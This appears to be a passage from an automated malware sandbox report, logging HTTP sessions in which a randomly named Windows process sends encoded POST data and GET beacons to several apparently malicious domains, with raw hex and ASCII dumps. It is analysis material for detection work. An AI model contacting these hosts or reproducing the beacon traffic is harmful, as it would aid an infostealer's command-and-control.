[TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.2.8497403.33.130.190803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:45:31.785795927 CEST360OUTGET /2w7y/?dD=3XyH6pjxGLhPK&7FhphPx8=Lawv0YecSOnZdZmp6B7rN+coqY7pSb/9YfPVtq1IvWwToR7xRnuq3CLFfh0Vaxr7O62UC86yvXBBKTgeeftZ3A1ObV/07dRLVO5P4hXPb+DhwEJ5M29tcAJMbTexkiGgNw== HTTP/1.1
                                                    Host: www.filelabel.info
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:45:32.246546984 CEST413INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Wed, 11 Sep 2024 13:45:32 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 273
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 64 44 3d 33 58 79 48 36 70 6a 78 47 4c 68 50 4b 26 37 46 68 70 68 50 78 38 3d 4c 61 77 76 30 59 65 63 53 4f 6e 5a 64 5a 6d 70 36 42 37 72 4e 2b 63 6f 71 59 37 70 53 62 2f 39 59 66 50 56 74 71 31 49 76 57 77 54 6f 52 37 78 52 6e 75 71 33 43 4c 46 66 68 30 56 61 78 72 37 4f 36 32 55 43 38 36 79 76 58 42 42 4b 54 67 65 65 66 74 5a 33 41 31 4f 62 56 2f 30 37 64 52 4c 56 4f 35 50 34 68 58 50 62 2b 44 68 77 45 4a 35 4d 32 39 74 63 41 4a 4d 62 54 65 78 6b 69 47 67 4e 77 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dD=3XyH6pjxGLhPK&7FhphPx8=Lawv0YecSOnZdZmp6B7rN+coqY7pSb/9YfPVtq1IvWwToR7xRnuq3CLFfh0Vaxr7O62UC86yvXBBKTgeeftZ3A1ObV/07dRLVO5P4hXPb+DhwEJ5M29tcAJMbTexkiGgNw=="}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    25192.168.2.8497413.33.130.190803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:45:37.295428038 CEST607OUTPOST /y13u/ HTTP/1.1
                                                    Host: www.comrade.lol
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.comrade.lol
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Connection: close
                                                    Referer: http://www.comrade.lol/y13u/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 53 46 66 66 55 59 35 78 50 43 2b 4f 58 4d 6e 75 77 76 62 70 61 53 7a 48 51 59 71 4c 4c 6b 30 73 77 4d 55 58 74 76 49 42 31 74 2b 32 66 48 55 54 66 46 56 41 36 69 79 30 33 75 52 61 4a 65 6f 32 47 55 34 52 57 32 76 44 44 4d 33 35 2f 72 64 6e 72 30 61 79 68 34 78 65 49 62 6c 6a 6c 34 6d 75 55 2b 30 6a 42 2b 4c 31 52 6b 6d 70 57 2f 41 70 57 7a 71 6f 72 36 4c 49 56 54 33 47 6a 54 37 45 4d 63 4c 2f 4c 56 38 37 31 68 73 74 4d 55 48 77 48 46 39 65 2b 76 72 48 41 75 55 77 45 33 47 32 6a 59 70 34 62 4f 68 77 43 4d 53 77 48 46 55 66 45 6a 42 51 77 55 56 6e 78 76 42 56 79 56 4c 4c 2f 4f 58 4f 63 33 30 3d
                                                    Data Ascii: 7FhphPx8=SFffUY5xPC+OXMnuwvbpaSzHQYqLLk0swMUXtvIB1t+2fHUTfFVA6iy03uRaJeo2GU4RW2vDDM35/rdnr0ayh4xeIbljl4muU+0jB+L1RkmpW/ApWzqor6LIVT3GjT7EMcL/LV871hstMUHwHF9e+vrHAuUwE3G2jYp4bOhwCMSwHFUfEjBQwUVnxvBVyVLL/OXOc30=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    26192.168.2.8497423.33.130.190803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:45:39.844402075 CEST627OUTPOST /y13u/ HTTP/1.1
                                                    Host: www.comrade.lol
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.comrade.lol
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Connection: close
                                                    Referer: http://www.comrade.lol/y13u/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 53 46 66 66 55 59 35 78 50 43 2b 4f 57 76 76 75 78 4d 6a 70 53 53 7a 45 56 59 71 4c 65 55 30 6f 77 4d 59 58 74 75 4d 76 31 5a 53 32 66 69 51 54 63 45 56 41 35 69 79 30 6a 2b 51 51 4e 65 6f 78 47 55 6c 6d 57 33 54 44 44 4d 6a 35 2f 71 4e 6e 72 6e 43 7a 67 6f 78 4c 52 72 6c 6c 6f 59 6d 75 55 2b 30 6a 42 2b 66 4c 52 69 4f 70 57 50 51 70 56 53 71 72 6f 36 4c 58 57 54 33 47 79 44 37 41 4d 63 4c 6e 4c 55 67 42 31 6a 6b 74 4d 57 66 77 48 55 39 64 6e 66 72 37 4f 4f 56 56 56 6c 44 37 70 72 70 4c 51 66 4e 67 41 64 72 55 47 7a 35 31 65 42 4a 57 7a 55 39 4d 78 73 70 6a 33 69 57 6a 6c 74 48 2b 43 67 6a 38 6b 35 71 79 39 55 79 63 43 55 5a 70 7a 34 76 45 37 69 55 59
                                                    Data Ascii: 7FhphPx8=SFffUY5xPC+OWvvuxMjpSSzEVYqLeU0owMYXtuMv1ZS2fiQTcEVA5iy0j+QQNeoxGUlmW3TDDMj5/qNnrnCzgoxLRrlloYmuU+0jB+fLRiOpWPQpVSqro6LXWT3GyD7AMcLnLUgB1jktMWfwHU9dnfr7OOVVVlD7prpLQfNgAdrUGz51eBJWzU9Mxspj3iWjltH+Cgj8k5qy9UycCUZpz4vE7iUY


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    27192.168.2.8497433.33.130.190803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:45:42.380361080 CEST1644OUTPOST /y13u/ HTTP/1.1
                                                    Host: www.comrade.lol
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.comrade.lol
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Referer: http://www.comrade.lol/y13u/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 53 46 66 66 55 59 35 78 50 43 2b 4f 57 76 76 75 78 4d 6a 70 53 53 7a 45 56 59 71 4c 65 55 30 6f 77 4d 59 58 74 75 4d 76 31 59 47 32 66 77 59 54 66 6a 68 41 34 69 79 30 67 2b 51 54 4e 65 6f 73 47 55 39 69 57 33 66 31 44 50 62 35 39 49 56 6e 38 6d 43 7a 70 6f 78 4c 4d 62 6c 67 6c 34 6d 37 55 2b 6b 6e 42 2b 50 4c 52 69 4f 70 57 4e 59 70 43 54 71 72 6b 61 4c 49 56 54 33 4b 6a 54 37 38 4d 63 54 5a 4c 56 56 38 32 53 45 74 4c 32 50 77 4c 47 56 64 34 76 72 35 4a 4f 56 33 56 6b 2b 37 70 72 31 48 51 66 4a 4b 41 61 48 55 48 47 6b 4c 4f 43 74 7a 6e 31 74 4f 36 4d 4a 5a 7a 77 4f 2f 76 50 2f 56 65 69 48 63 79 2f 75 5a 77 53 79 42 44 30 34 5a 6d 76 66 50 34 6c 51 51 43 66 48 4f 36 65 72 42 4d 6f 4f 73 7a 4f 68 51 63 6c 4b 69 6c 39 4a 59 79 43 52 62 33 58 56 32 30 4a 67 6d 6c 58 36 4e 31 76 33 71 33 59 32 75 56 32 75 49 58 54 31 46 48 37 55 2f 55 4c 35 47 62 70 45 6a 38 6b 44 78 41 6b 43 63 76 55 67 59 39 6a 2f 71 78 43 32 4a 6d 5a 32 45 62 64 5a 6b 45 7a 31 42 30 66 66 77 7a 37 44 63 4b [TRUNCATED]
                                                    Data Ascii: 7FhphPx8=SFffUY5xPC+OWvvuxMjpSSzEVYqLeU0owMYXtuMv1YG2fwYTfjhA4iy0g+QTNeosGU9iW3f1DPb59IVn8mCzpoxLMblgl4m7U+knB+PLRiOpWNYpCTqrkaLIVT3KjT78McTZLVV82SEtL2PwLGVd4vr5JOV3Vk+7pr1HQfJKAaHUHGkLOCtzn1tO6MJZzwO/vP/VeiHcy/uZwSyBD04ZmvfP4lQQCfHO6erBMoOszOhQclKil9JYyCRb3XV20JgmlX6N1v3q3Y2uV2uIXT1FH7U/UL5GbpEj8kDxAkCcvUgY9j/qxC2JmZ2EbdZkEz1B0ffwz7DcKp81+jLMSwTd/r/1bipqR2J2gudJyoVvxeFKGSHpEjVF4Pt1AFKUTThCyOHzI7pGQfeldSllimY5wkpFX6tQiwOeu65C2ft9184kfMMrdRSXBw3cKZOb+vxNDkmlQCmoqZAAIS68vf3B4+0jJqsSze5Fr522sNa8NxUyI5XFT7Rcb3Sv+DIjxoPO3hOs7Ziwf831ZzSOf8gXPLVhNfF70wANAepxuFWBWsPFm9HQ88CxaJTxXP1gkmrl3CO+Aq3Szo/enInuesCqqmdkDDAdCk4bfWEp9JVtDtGClWBm3Pee5hxPM5IV7zGcLSxPS+NkKKmxAh632joNskFwQrBe4E2rK6UjZ5pEjJgYebdjirQJAlsPCOgPbZ6nTdoJt7HDzywyuIcNMZwFsyq69WILpwDiIEirHxh/HWJScrFuFvzi1v267v+bKEJuM6qFvukAsbx8Yec3Fmh+gvAzF8ih81u75a5pKgXivqj4Gv9uk7Xq9XGPRnityTWpAqjvTfWIk8drbCzbIW71kma/As/HIk2RTUcWVSBLrDDlP5/GkyUUqC7DmBcXPeic+XiG3LvbQ1KA6UFrI7lkkEeWUqOzbeuva5dd99JX6wmmv1HHiUBhEsPI/ejneiOPmVEUin3urbtT7tiet8IfqtEj8tNDScW+gfOr9R8aqaW [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    28192.168.2.8497443.33.130.190803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:45:44.929357052 CEST357OUTGET /y13u/?7FhphPx8=fH3/Xv1nMASIQ/zMydPCNRqTRo/7DHU21rAsiPZWyPbRdSEWP3tT61GDvb9wKeE7ACEQcE/YA9zT1IEe20vxhqwBFMQRq7yvXeclZd7UWFm0QPQ8MC+KotTERjHUuT2ydA==&dD=3XyH6pjxGLhPK HTTP/1.1
                                                    Host: www.comrade.lol
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:45:46.317312956 CEST413INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Wed, 11 Sep 2024 13:45:46 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 273
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 37 46 68 70 68 50 78 38 3d 66 48 33 2f 58 76 31 6e 4d 41 53 49 51 2f 7a 4d 79 64 50 43 4e 52 71 54 52 6f 2f 37 44 48 55 32 31 72 41 73 69 50 5a 57 79 50 62 52 64 53 45 57 50 33 74 54 36 31 47 44 76 62 39 77 4b 65 45 37 41 43 45 51 63 45 2f 59 41 39 7a 54 31 49 45 65 32 30 76 78 68 71 77 42 46 4d 51 52 71 37 79 76 58 65 63 6c 5a 64 37 55 57 46 6d 30 51 50 51 38 4d 43 2b 4b 6f 74 54 45 52 6a 48 55 75 54 32 79 64 41 3d 3d 26 64 44 3d 33 58 79 48 36 70 6a 78 47 4c 68 50 4b 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7FhphPx8=fH3/Xv1nMASIQ/zMydPCNRqTRo/7DHU21rAsiPZWyPbRdSEWP3tT61GDvb9wKeE7ACEQcE/YA9zT1IEe20vxhqwBFMQRq7yvXeclZd7UWFm0QPQ8MC+KotTERjHUuT2ydA==&dD=3XyH6pjxGLhPK"}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    29192.168.2.8497453.33.130.190803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:45:51.373349905 CEST610OUTPOST /484o/ HTTP/1.1
                                                    Host: www.takitoon.xyz
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.takitoon.xyz
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Connection: close
                                                    Referer: http://www.takitoon.xyz/484o/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 2b 33 50 71 30 41 6b 42 67 55 67 62 76 39 63 6c 59 75 5a 41 35 37 4e 4a 44 54 74 52 61 43 49 5a 45 65 75 4f 33 38 44 69 71 61 72 70 4e 6b 32 68 76 6b 36 77 30 50 65 6a 69 75 59 4c 62 51 31 4a 39 41 47 67 53 47 31 55 4f 4b 79 2b 77 34 34 45 65 6a 43 75 69 43 37 79 45 64 5a 6b 55 4a 52 4b 77 37 37 59 35 45 76 4a 56 6e 5a 61 69 32 68 71 34 34 66 51 38 65 2f 58 38 79 61 31 4e 6e 4d 76 57 30 4e 41 5a 4a 5a 2f 4d 43 61 41 42 75 49 41 4a 63 79 45 78 78 78 6d 74 33 57 56 39 34 6a 2f 67 65 43 4b 5a 59 59 63 42 48 46 69 74 52 56 45 64 54 4f 7a 59 64 57 6c 4b 6b 75 59 55 75 53 42 76 44 63 33 62 55 49 3d
                                                    Data Ascii: 7FhphPx8=+3Pq0AkBgUgbv9clYuZA57NJDTtRaCIZEeuO38DiqarpNk2hvk6w0PejiuYLbQ1J9AGgSG1UOKy+w44EejCuiC7yEdZkUJRKw77Y5EvJVnZai2hq44fQ8e/X8ya1NnMvW0NAZJZ/MCaABuIAJcyExxxmt3WV94j/geCKZYYcBHFitRVEdTOzYdWlKkuYUuSBvDc3bUI=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    30192.168.2.8497463.33.130.190803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:45:53.913382053 CEST630OUTPOST /484o/ HTTP/1.1
                                                    Host: www.takitoon.xyz
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.takitoon.xyz
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Connection: close
                                                    Referer: http://www.takitoon.xyz/484o/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 2b 33 50 71 30 41 6b 42 67 55 67 62 75 64 73 6c 5a 4e 78 41 78 37 4e 57 64 6a 74 52 54 69 49 6a 45 65 69 4f 33 39 48 79 71 49 2f 70 4e 46 47 68 75 67 75 77 31 50 65 6a 70 4f 59 45 47 41 31 43 39 41 44 44 53 44 4e 55 4f 4c 57 2b 77 35 6f 45 65 79 43 70 77 69 37 30 50 39 5a 6d 62 70 52 4b 77 37 37 59 35 46 4c 76 56 6e 42 61 69 47 52 71 35 5a 66 58 31 2b 2f 55 73 43 61 31 4a 6e 4e 48 57 30 4e 32 5a 4a 6f 53 4d 41 53 41 42 73 51 41 4a 4e 79 46 2f 78 78 6b 67 58 58 45 75 36 71 74 75 73 43 39 43 37 35 36 42 6c 35 4d 6c 48 34 75 48 78 47 31 62 64 2b 4f 4b 6e 47 75 52 5a 50 70 31 67 4d 48 46 44 65 39 30 65 73 5a 47 63 4e 53 76 48 6b 79 2b 58 54 62 37 45 7a 61
                                                    Data Ascii: 7FhphPx8=+3Pq0AkBgUgbudslZNxAx7NWdjtRTiIjEeiO39HyqI/pNFGhuguw1PejpOYEGA1C9ADDSDNUOLW+w5oEeyCpwi70P9ZmbpRKw77Y5FLvVnBaiGRq5ZfX1+/UsCa1JnNHW0N2ZJoSMASABsQAJNyF/xxkgXXEu6qtusC9C756Bl5MlH4uHxG1bd+OKnGuRZPp1gMHFDe90esZGcNSvHky+XTb7Eza


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    31192.168.2.8497473.33.130.190803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:45:56.461873055 CEST1647OUTPOST /484o/ HTTP/1.1
                                                    Host: www.takitoon.xyz
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.takitoon.xyz
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Referer: http://www.takitoon.xyz/484o/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 2b 33 50 71 30 41 6b 42 67 55 67 62 75 64 73 6c 5a 4e 78 41 78 37 4e 57 64 6a 74 52 54 69 49 6a 45 65 69 4f 33 39 48 79 71 49 6e 70 4f 33 4f 68 76 43 47 77 32 50 65 6a 6d 65 59 55 47 41 31 62 39 45 76 66 53 44 4a 69 4f 49 2b 2b 71 62 77 45 4a 51 71 70 37 69 37 30 41 64 5a 72 55 4a 51 51 77 2f 58 63 35 45 37 76 56 6e 42 61 69 46 4a 71 2b 49 66 58 33 2b 2f 58 38 79 61 78 4e 6e 4d 71 57 30 55 44 5a 49 64 76 4d 77 79 41 42 4d 41 41 46 66 61 46 67 42 78 69 6a 58 58 63 75 36 33 7a 75 73 65 78 43 36 63 66 42 6d 70 4d 6d 79 64 33 64 53 57 38 46 38 69 73 4f 56 2b 61 49 37 54 34 2b 78 38 70 4d 53 71 62 36 70 6b 7a 47 4e 68 37 70 6e 6c 59 67 54 58 4e 2f 44 4c 52 68 59 6e 61 39 43 32 38 49 31 74 4e 58 6b 6c 36 48 6e 6f 64 7a 38 49 71 68 34 77 6e 57 4d 4d 35 6b 63 6b 4e 77 71 69 32 4f 6b 65 6f 45 31 67 61 50 44 78 75 37 6c 6a 54 74 46 38 51 32 64 31 69 63 33 58 51 67 57 71 55 2b 4d 6d 51 69 6b 2b 44 69 7a 59 2b 48 67 74 59 46 35 79 7a 4e 32 34 79 62 32 42 72 55 37 4f 42 79 30 58 54 2b [TRUNCATED]
                                                    Data Ascii: 7FhphPx8=+3Pq0AkBgUgbudslZNxAx7NWdjtRTiIjEeiO39HyqInpO3OhvCGw2PejmeYUGA1b9EvfSDJiOI++qbwEJQqp7i70AdZrUJQQw/Xc5E7vVnBaiFJq+IfX3+/X8yaxNnMqW0UDZIdvMwyABMAAFfaFgBxijXXcu63zusexC6cfBmpMmyd3dSW8F8isOV+aI7T4+x8pMSqb6pkzGNh7pnlYgTXN/DLRhYna9C28I1tNXkl6Hnodz8Iqh4wnWMM5kckNwqi2OkeoE1gaPDxu7ljTtF8Q2d1ic3XQgWqU+MmQik+DizY+HgtYF5yzN24yb2BrU7OBy0XT+vQSh3yQeJX0QzL2hEaS9HxLu2zc12SUlotp4UX1K56WQyOmaupge5RSV0xeUXS7XVeM+m3E+ZHfD1QhFM6JnOqT7/yudywHe+znMnClfvLMngCbdHDkrDeWSoVraYYYtx/+SYU6+kOHVuyYD4vhCZTG0p32apVNsIY1tK60ys1sG6Am3meZVKt/ByrqHcJU19lkWWWPKyt3bpcW1CKPlSrzICn6y28Sir8mAz9k6vutsGl/aQCqsjC9Pq9mDUQHq6XmYOJbJ6o+LSL/ZEwqTuTWaC1XpLN29Bj7DtDODrEyX2JORmAZ9nytASOSjs7Wujp8ABBGPfUAsbuSXvnjqwlKlXBpeVjCloc6Q3GdxtQB8kYjoq3IJpQINC1A3XUWeoljnbnmVgM3rzeFqrBoGtyXpdW6cpusMMkefVaZNE97zTzmVfehzUS7pcR1ZRq6mNZGNexZrPKCSDxiJcQ54vLFmQ5xEuGToABuOsWKO8P9k+d9a4f/SLqF9EPuAuXh5ZDzOm6I9FJaJcHoUDq3ynA15rmAHUaYWx+P47Ajjr4F+mGOQpj4Eou5Q898e2/VNvSfn7+pGtj1ZVhkf1EDcLTJJjfUnfi7sQI+NycbgmAzyKBjUU8vQ3AL3W5N1IIQzrpQoCDrH4lVimG4GdxIKRQUtehD98wztt3 [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    32192.168.2.8497483.33.130.190803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:45:59.003318071 CEST358OUTGET /484o/?dD=3XyH6pjxGLhPK&7FhphPx8=z1nK31grp15IuvUbSP4/u/QrWitMYn42JKqO08GB6oqTWnKkjAzy9dGBseVsOzNK4BinV2NwNZiNjrhzDSa+ygrHL9YkaYF0wsPm43jKW1EMq01K+L7L4dXd6SCtK3hNJA== HTTP/1.1
                                                    Host: www.takitoon.xyz
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:45:59.501399994 CEST413INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Wed, 11 Sep 2024 13:45:59 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 273
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 64 44 3d 33 58 79 48 36 70 6a 78 47 4c 68 50 4b 26 37 46 68 70 68 50 78 38 3d 7a 31 6e 4b 33 31 67 72 70 31 35 49 75 76 55 62 53 50 34 2f 75 2f 51 72 57 69 74 4d 59 6e 34 32 4a 4b 71 4f 30 38 47 42 36 6f 71 54 57 6e 4b 6b 6a 41 7a 79 39 64 47 42 73 65 56 73 4f 7a 4e 4b 34 42 69 6e 56 32 4e 77 4e 5a 69 4e 6a 72 68 7a 44 53 61 2b 79 67 72 48 4c 39 59 6b 61 59 46 30 77 73 50 6d 34 33 6a 4b 57 31 45 4d 71 30 31 4b 2b 4c 37 4c 34 64 58 64 36 53 43 74 4b 33 68 4e 4a 41 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dD=3XyH6pjxGLhPK&7FhphPx8=z1nK31grp15IuvUbSP4/u/QrWitMYn42JKqO08GB6oqTWnKkjAzy9dGBseVsOzNK4BinV2NwNZiNjrhzDSa+ygrHL9YkaYF0wsPm43jKW1EMq01K+L7L4dXd6SCtK3hNJA=="}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    33192.168.2.849749199.59.243.226803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:46:04.625808954 CEST622OUTPOST /zksk/ HTTP/1.1
                                                    Host: www.pmjjewels.online
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.pmjjewels.online
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Connection: close
                                                    Referer: http://www.pmjjewels.online/zksk/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 63 61 70 67 6c 4c 78 6c 37 7a 34 49 55 4a 77 56 6e 33 39 6a 43 37 74 42 42 51 68 32 6f 69 71 61 70 75 37 69 75 61 6d 61 54 6a 4e 2b 47 4c 6b 2b 78 49 44 76 67 69 6e 4f 59 58 41 30 2f 74 67 70 56 57 58 51 79 7a 6c 2b 56 64 2b 70 68 62 69 62 77 31 47 77 6c 72 67 78 2b 7a 39 6a 2f 55 2f 35 6d 6f 74 37 56 72 30 76 6e 59 6e 35 46 4a 31 58 70 57 39 4b 64 43 39 30 4c 45 2f 6e 61 53 51 72 46 63 6c 69 39 6f 76 45 6c 78 46 54 39 34 7a 57 47 39 63 6b 65 4d 4a 6a 59 69 62 7a 4c 6e 64 4e 35 66 61 39 4a 57 74 53 41 2b 2b 4a 41 77 69 38 75 2f 34 38 79 6e 57 6c 6d 51 7a 2b 76 6b 52 57 48 49 5a 78 58 69 51 3d
                                                    Data Ascii: 7FhphPx8=capglLxl7z4IUJwVn39jC7tBBQh2oiqapu7iuamaTjN+GLk+xIDvginOYXA0/tgpVWXQyzl+Vd+phbibw1Gwlrgx+z9j/U/5mot7Vr0vnYn5FJ1XpW9KdC90LE/naSQrFcli9ovElxFT94zWG9ckeMJjYibzLndN5fa9JWtSA++JAwi8u/48ynWlmQz+vkRWHIZxXiQ=
                                                    Sep 11, 2024 15:46:05.086605072 CEST1236INHTTP/1.1 200 OK
                                                    date: Wed, 11 Sep 2024 13:46:04 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1130
                                                    x-request-id: 3d8430e7-eceb-419d-8cbb-c166a23fb2c9
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
